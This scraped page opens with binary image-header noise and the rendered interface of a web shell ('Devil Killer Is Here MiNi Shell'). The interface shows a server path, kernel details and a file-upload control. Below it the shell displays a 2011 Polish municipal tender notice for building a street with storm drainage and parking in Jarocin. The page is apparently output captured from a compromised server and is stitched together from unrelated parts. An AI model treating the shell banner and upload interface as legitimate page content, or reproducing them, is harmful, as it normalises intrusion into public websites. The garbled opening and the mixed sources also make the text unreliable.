JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111213/328469-N-2011.html

<p class="kh_header"><b>Jarocin: Budowa ulicy Solidarności w Jarocinie wraz z kanalizacją deszczową, parkingami i usunięciem kolizji telekomunikacyjnej</b><br>
<b>Numer ogłoszenia: 328469 - 2011; data zamieszczenia: 13.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 062 7472611, faks 062 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ulicy Solidarności w Jarocinie wraz z kanalizacją deszczową, parkingami i usunięciem kolizji telekomunikacyjnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ DROGOWA
Projektowana ulica Solidarności składa się z sześciu odcinków prostych i pięciu łuków kołowych. Całkowita długość drogi wynosi 404,17 m.
Początek projektowanej ulicy zlokalizowano w km 0+000,00 na skrzyżowaniu z ulicą 
ks. J. Popiełuszki natomiast koniec odcinka zlokalizowano w km 0+404,17 na skrzyżowaniu 
z ulicą Piaskową.
Opis trasy w przekroju podłużnym
Niweletę ulicy zaprojektowano uwzględniając ukształtowanie terenu oraz przy założeniu zapewnienia minimalnych pochyleń podłużnych gwarantujących prawidłowe i sprawne odprowadzenie wód opadowych. Niweleta zapewnia również prawidłowe powiązanie drogi z przyległym terenem.
Minimalny spadek podłużny niwelety na projektowanej ulicy na odcinkach o stałych pochyleniach wynosi 0,30 %, natomiast maksymalny wynosi 1,09 %.
Opis trasy w przekroju poprzecznym
Dla ulicy w przekroju poprzecznym przyjęto pochylenie poprzeczne jezdni daszkowe o wartości 2,0 % a na łukach zgodnie z Rozporządzeniem Ministra transportu i Gospodarki Morskiej z dnia 2 maja 1999 r. W sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie. Szerokość pasa ruchu wynosi 3,00 m (na poszerzeniu 4,00 m). Zakłada się również wykonanie miejsc postojowych o wymiarach 2,30x4,50m (dla niepełnosprawnych 3,60x4,50m), chodnika o szerokości 2,00 m i ścieżki rowerowej o szerokości 2,00m.
Nawierzchnię przy chodniku ograniczono krawężnikiem betonowym 15x30cm na ławie betonowej C12/15, a przy miejscach krawężnikiem najazdowym 15x22cm na ławie betonowej C12/15.
Chodniki ograniczono obrzeżem betonowym 8x30 na podsypce piaskowo - cementowej.
Projektowana konstrukcja nawierzchni
Budowę ulicy Solidarności należy wykonać stosując następującą konstrukcję
nawierzchni jezdni (przy założeniu kategorii ruchu KR 2):
- warstwa ścieralna: beton asfaltowy AC 11 S 50/70 - gr. 5 cm;
- warstwa wiążąca: beton asfaltowy AC 16 W 50/70 - gr. 7 cm;
- podbudowa zasadnicza: kruszywo łamane stabilizowane mechanicznie 0/63 mm - gr. 20 cm;
- podbudowa pomocnicza: grunt stabilizowany cementem o Rm=5MPa - gr. 15 cm;
Zjazdy indywidualne i publiczne
Na odcinku drogi gminnej objętej niniejszym opracowaniem przewidziano budowę piętnastu zjazdów indywidualnych i dwóch publicznych.
Szerokość zjazdów indywidualnych wynosi 4,50m, a publicznych 5,00m. Na włączeniu krawędzi zjazdu do krawędzi jezdni zastosowano skos 1:1 lub łuk o R=0,5m. Na zjazdach należy wykonać obniżenie krawężników betonowych na długości 1m o 8cm. Zjazdy od strony prywatnych posesji należy ograniczyć opornikiem betonowym 12x25cm.
Konstrukcja nawierzchni zjazdów jest następująca:
- warstwa ścieralna: kostka betonowa (czerwona), 
Przekroje normalne - gr. 8 cm;
- podsypka piaskowa 1:4 - gr. 5 cm;
- podbudowa zasadnicza: chudy beton o Rm = 6/9 MPa - gr. 15 cm;
Projektowana konstrukcja miejsc postojowych
Wzdłuż projektowanej jezdni zakłada się wykonanie 97 miejsc postojowych i trzech miejsc dla niepełnosprawnych. Miejsca postojowe należy wykonać stosując następującą konstrukcję:
- warstwa ścieralna: kostka betonowa grafitowa - gr. 8 cm;
- podsypka cementowo-piaskowa 1:4 - gr. 5 cm;
- podbudowa zasadnicza: kruszywo łamane stabilizowane mechanicznie 0/63 mm - gr. 20 cm;
- podbudowa pomocnicza: grunt stabilizowany cementem o Rm=5MPa - gr. 15 cm;
Miejsca postojowe należy wydzielić brukowa kostką betonową koloru czerwonego.
Projektowana konstrukcja chodników
Chodnik należy wykonać z dwóch stron projektowanej jezdni o szerokości od 2,00 m do 4,00m. 
- warstwa ścieralna: brukowa kostka betonowa koloru szarego, 
Przekroje normalne - gr. 8 cm;
- podsypka cementowo-piaskowa 1:4 - gr. 5 cm;
- podbudowa zasadnicza: grunt stabilizowany cementem o Rm = 5MPa - gr. 10 cm;
Projektowana konstrukcja ścieżki rowerowej
Ścieżkę rowerową należy wykonać od km: 0+248,00 do km: 0+404,17 m z lewej strony jezdni przy chodniku o szerokości od 2,00 m.
- warstwa ścieralna: brukowa kostka betonowa koloru czerwonego, 
Przekroje normalne - gr. 8 cm;
- podsypka cementowo - piaskowa 1:4 - gr. 5 cm;
- podbudowa zasadnicza: grunt stabilizowany cementem o Rm = 5MPa - gr. 10 cm;
Zieleń
Zakłada się humusowanie gr. 10 cm wraz z obsianiem trawą.

 
KANALIZACJA DESZCZOWA
Przedmiotem inwestycji jest budowa ulicy Solidarności w Jarocinie wraz z odwodnieniem - kanalizacją deszczową z przykanalikami i przyłączami z odprowadzeniem wody do istniejącej kanalizacji deszczowej w ulicy Popiełuszki i ulicy Piaskowej.
Zakres inwestycji:
- Kolektory deszczowe - o łącznej długości: 375,72 m
- Przykanaliki deszczowe - w ilości 27 sztuk o łącznej długości 179,13 m
- Przyłącza kanalizacyjne - w ilości 15 sztuk o łącznej długości 99,04 m
Kanalizacja deszczowa została zlokalizowana na działkach ewidencyjnych zgodnie z wypisem z planu zagospodarowania przestrzennego Miasta Jarocin.
Sieć kanalizacji deszczowej zostanie ułożona w drodze i na terenach zielonych na głębokości od 1,20 m do 2,16 m. Projektuje się sieć kanalizacyjną o średnicy O 400 mm długości 205,79 m, i O 315 mm długości 169,93 m z rur typ PVC -U typu ciężkiego. Ogólna długość kolektorów deszczowych wynosi 375,72 m, a przykanalików deszczowych wynosi 179,13 m i przyłączy 99,04 m. Połączenie przykanalików i przyłączy z kolektorami należy wykonać za pomocą betonowych studni kanalizacyjnych o średnicy O 1200 mm.
Przykanaliki i przyłącza deszczowe wykonane będą z rur typu PVC -U typu ciężkiego średnicy O 160 mm i O 200 mm. Zakończenie odcinka wyprowadzonego przykanalika należy zakończyć studzienką z PE O 600 mm z wpustem deszczowym.
Opracowanie projektowe obejmuje budowę kanalizacji deszczowej z przykanalikami i przyłączami na ulicy Solidarności w miejscowości Jarocin, pow. jarociński, woj. Wielkopolski.
Zakres robót:
- Kolektory deszczowe: D-1, D-2 o łącznej długości 375,72 m.
- Przykanaliki obejmujące odpływ wód z wpustów deszczowych do w/w kolektorów w ilości 27 sztuk o łącznej długości 179,13 m.
- Przyłączy kanalizacyjnych z przyległych do ulicy działek w ilości 15 sztuk o łącznej długości 90,04 m
- Łączna długość kolektorów wraz z przykanalikami i przyłączami wynosi 671,89 m.
 
TELEKOMUNIKACJA
Usunięcie kolizji z siecią NETIA
W związku z usunięciem kolizji z siecią NETIA w ramach budowy ulicy Solidarności w Jarocinie
przewiduje się:
- demontaż istniejących studni kablowych SK - 5szt,
- demontaż kanalizacji kablowej 2-u otworowej - 250m,
- demontaż kanalizacji kablowej 3-y otworowej - 55m,
- budowę studni kablowych SKR2 - 8 szt.,
- budowę kanalizacji kablowej 2-u otworowej - 250m,
- budowę kanalizacji kablowej 3-y otworowej - 65m,
- budowę nowych odcinków kabli XzTKMXpw w kanalizacji kablowej,
- montaż złączy równoległych na przebudowywany

Zaleca się aby Wykonawcy dokonali wizji lokalnej na terenie realizacji projektu i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.

W przypadku gdy dokumentacja techniczna bądź przedmiar robót zawierać będzie nazwę producenta danego wyrobu, materiału itp. - Zamawiający w każdym przypadku dopuszcza możliwość zastosowania produktów, materiałów itp. równoważnych!.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.52-5, 45.23.31.20-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 30 000,00 zł  (słownie: trzydzieści tysięcy złotych 00/100) w jednej z form określonych w art. 45 ust. 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych na rachunek bankowy nr:  
91 1090 1131 0000 0000 1300 1942.
W przypadku wniesienia wadium w formie niepieniężnej, oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć w Urzędzie Miejskim  w Jarocinie,
pok. nr 56 do dnia 28.12.2011r. do godz. 09:00. Ksero potwierdzone za zgodność 
z oryginałem należy dołączyć do oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać się doświadczeniem w wykonaniu (zakończeniu) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a)	minimum dwóch niezależnych robót, których przedmiotem zamówienia była budowa dróg z masy mineralno-asfaltowej o wartości nie mniejszej niż 1.000.000,00 zł brutto,
b)	minimum dwóch niezależnych robót polegających na wykonaniu kanalizacji deszczowej o wartości nie mniejszej niż 500.000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż wielkość średniego rocznego zatrudnienia u Wykonawcy robót budowlanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy -  w tym okresie wynosiła co najmniej 30 pracowników.
Ponadto przy realizacji niniejszego zamówienia, Wykonawca dysponuje lub będzie dysponował:
1)	kierownikiem budowy z uprawnieniami bez ograniczeń do kierowania robotami budowlanymi w specjalności drogowej, który pełnił funkcję kierownika budowy przy minimum jednej robocie budowlanej, polegającej na budowie, przebudowie lub rozbudowie dróg o wartości minimum 2 mln złotych polskich; osoba ta musi być członkiem  Izby Inżynierów Budownictwa,
2)	kierownikami robót z uprawnieniami do kierowania robotami budowlanymi
w specjalności branży:
a)	sanitarnej,
b)	elektrycznej (telekomunikacja),
       osoby te muszą być członkiem Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże,  że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej prawidłowe wykonanie przedmiotu zamówienia poprzez przedstawienie: 
a)	informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej posiadanie środków finansowych lub zdolność kredytową Wykonawcy w wysokości 2.000.000,00 zł brutto, 
b)	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, 
że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, przy czym suma gwarancyjna nie może być mniejsza niż 1.000.000,00 zł brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy - sporządzony przez Wykonawcę,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz. 759 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy 
w stosunku do treści oferty w zakresie:
1.	Terminu realizacji zamówienia; termin realizacji zamówienia może ulec zmianie 
w przypadku:
a)	zaistnienia okoliczności zawartych w art. 67 ust. 1 pkt. 5 ustawy z dnia 
29 stycznia 2004 r. Prawo zamówień publicznych,
b)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego,
c)	z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego wykonawcę robót,
d)	z powodu okoliczności siły wyższej, klęski żywiołowej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu, ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
e)	 z powodu szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów;
f)	  wykopalisk uniemożliwiających prowadzenie robót budowlanych, niewypałów 
i niewybuchów;
g)	odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych (kategorie gruntu, kurzawka itp.) oraz warunków terenowych, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
h)	jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
- wstrzymanie robót przez Zamawiającego;
- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;
i)	  jeżeli powstaną okoliczności będące następstwem działania organów administracji, 
w szczególności:
- przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji itp.;
- odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej;
j)	  jeżeli powstały konieczne zmiany technologiczne, w szczególności:
- konieczności zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych, technologicznych niż wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem projektu;
k)	opóźnienia Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań: 
- przekazania terenu budowy;
- przekazania dokumentacji budowy (pozwolenie na budowę, dokumentacji projektowej,  specyfikacji technicznych, innych wymaganych przepisami, do których zamawiający był zobowiązany);
- przekazanie dokumentów zamiennych budowy lub usunięcia wad w dostarczanej dokumentacji projektowej;
- kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami, ale w takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji.
2.	Wynagrodzenia za przedmiot zamówienia:
1)	wynagrodzenie wykonawcy może ulec zmianie w przypadku zmiany powszechnie obowiązujących przepisów w zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia,
2)	w przypadku zaistnienia konieczności zmniejszenia zakresu robót, wyodrębnienia robót zaniechanych
3. Przedstawiciela wykonawcy, tj. kierownika budowy; Wykonawca może zmienić kierownika budowy na prośbę samego kierownika budowy oraz z przyczyn niezależnych od niego, tj. zdarzeń losowych (śmierć, choroba, zwolnienie) przy czym osoba zastępująca pierwotnego kierownika budowy będzie posiadała uprawnienia nie gorsze od niego.
